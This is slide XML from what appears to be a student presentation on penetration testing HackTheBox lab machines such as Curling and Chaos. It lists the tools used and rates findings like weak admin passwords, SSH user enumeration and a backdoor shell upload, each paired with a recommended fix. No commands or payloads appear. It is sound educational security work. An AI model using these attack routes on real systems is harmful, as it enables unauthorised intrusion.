                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Medium</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>10.10.10.120</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Rohan</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="880750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1"/>
                        <a:t>HackTheBox</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Curling</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Ubuntu 4.13.0</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Easy</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>10.10.10.150</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Simi</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437825" y="4405975"/>
            <a:ext cx="8437800" cy="3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96" name="Google Shape;96;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437875" y="240500"/>
            <a:ext cx="4979400" cy="5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Overview</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">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Learning Outcome</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>I had a better understanding of how to use tools that we had used in class before that i was confused about; Burp Suite, Nmap</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Had a better understanding of Bruteforcing</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Learnt how to use new tools like; Joomscan, CeWL, Wfuzz, Netcat,</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Learnt how to recognize a base64 txt(characters are divisible by 4)</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Had a better understanding of remote login using SSH</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>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en" sz="2400"/>
              <a:t>Had a better understanding of Penetration Testing Methodologies</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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xfrm>
            <a:off x="0" y="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Risk Assessment Methodology</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Google Shape;273;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-146650" y="1939350"/>
            <a:ext cx="9078000" cy="5634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6000" b="1" i="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Risk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6000" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6000" b="1" i="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>likelihood </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6000" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="6000" b="1" i="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t> impact</a:t>
            </a:r>
            <a:endParaRPr sz="6000" b="1">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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="67300" y="699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Findings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="279" name="Google Shape;279;p34"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="417900" y="1047750"/>
          <a:ext cx="8386800" cy="3687960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{158EDE2D-5140-4CE5-8088-8FD6ECF2DEED}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1257150">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1257175">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1357600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1528400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1819725">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1166750">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="326950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Parameter</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Risk Rating</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">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
                        <a:t>Impact Type</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Recommendation</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Machine</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="406300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Password Attacks</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Weak Admin</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Passwords</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>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 sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>High</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Confidentiality,Integrity and access loss</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FF0000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Hash + Salt, IDS</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Chaos</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="850725">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Vulnerable network Services</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>SSH, User enumeration</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>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 sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>High</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">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A61C00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Confidentiality, Integrity and availability loss</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="FF0000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnL>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>ACL, IDS, IDPS, Firewall</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Albania</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Chaos</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Curling</a:t>
                      </a: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1041175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Insufficient input validation and sanitization</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200"/>
                        <a:t>Web servers were not configured to sanitize user input allowing upload of backdoor shell to gain remote access</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnR w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A61C00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Critical</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425">
                    <a:lnL w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A61C00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnL>
                    <a:lnR w="9525" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="A61C00"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="sm" len="sm"/>
                      <a:tailEnd type="none" w="sm" len="sm"/>
                    </a:lnR>
